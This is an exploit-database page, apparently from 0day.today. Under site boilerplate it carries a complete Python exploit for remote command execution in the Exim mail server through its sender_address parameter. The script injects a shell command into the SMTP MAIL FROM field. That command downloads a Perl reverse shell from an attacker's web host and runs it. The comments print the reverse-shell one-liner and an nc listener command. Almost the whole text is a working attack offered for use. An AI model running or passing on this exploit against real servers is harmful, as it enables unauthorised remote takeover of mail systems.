0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Exim sender_address Parameter - RCE Exploit
[#!/usr/bin/env python
##################################################################################
## Exim sender_address Parameter - Remote Command Execution Exploit ##
##################################################################################
## ##
## Vulnerability found by RedTeam Pentesting GmbH ##
## https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/ ##
## ##
## Exploit written by eKKiM ##
## http://rdtx.eu/exim-with-dovecot-lda-rce-exploit/ ##
## ##
##################################################################################
## USAGE ##
##################################################################################
## ##
## Edit the PERL REVERSE SHELL MY_CONNECTBACK_IP and MY_CONNECTBACK_PORT and ##
## upload this perl reverse shell script to a webserver. ##
## ##
## Edit the PERL_SHELL variable to your own connectback script URL ##
## ##
## Start a listener: nc -vvn -l -p CONNECT_BACK_PORT ##
## ##
## Let the exploitin begin ##
## ##
##################################################################################
####### PERL REVERSE SHELL #######
## use Socket;$i="MY_CONNECTBACK_IP";$p=MY_CONNECTBACK_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
####### PERL REVERSE SHELL #######
import socket
import sys
####### URL TO YOUR CONNECTBACK SHELL #######
PERL_SHELL = "myhost.com/shell.pl"
####### URL TO YOUR CONNECTBACK SHELL #######
if len(sys.argv) != 2:
print "Usage: exim_exploit.py <target_ip> <optional_rcpt_address>"
print " <target_ip> target you want to test"
print " <optional_rcpt_address> an address which is accepted by exim (default: postmaster@localhost)"
exit(1)
RCPT_TO = "postmaster@localhost"
HOST = sys.argv[1]
PORT = 25
def read_line(s):
ret = ''
while True:
c = s.recv(1)
if c == '\n' or c == '':
break
else:
ret += c
return ret
if len(sys.argv) == 3:
RCPT_TO = sys.argv[2]
print "Exim sender_address Parameter - Remote Command Execution Exploit"
print "Bug discovered by RedTeam Pentesting GmbH"
print "Exploit created by eKKiM"
print ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
data = read_line(s);
if not(data.startswith("220")):
print "[ERROR] Is it SMTP Server?"
exit(1)
s.send("EHLO domain.local\n")
s.recv(4096)
s.send("MAIL FROM: x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}" + PERL_SHELL + "``perl${IFS}/tmp/p.pl`@blaat.com\n")
data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] MAIL FROM not accepted"
exit(1)
s.send("RCPT TO: " + RCPT_TO + "\n")
data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] RCPT_TO not accepted"
exit(1)
s.send("DATA\n")
data = read_line(s);
if not(data.startswith("354")):
print "[ERROR] Cannot send email content"
exit(1)
s.send("x\n.\n")
data = read_line(s);
if not(data.startswith("250")):
print "[ERROR] email content revoked"
exit(1)
print "[OK] Recieved shell?"
s.close()
# 0day.today [2024-11-15] #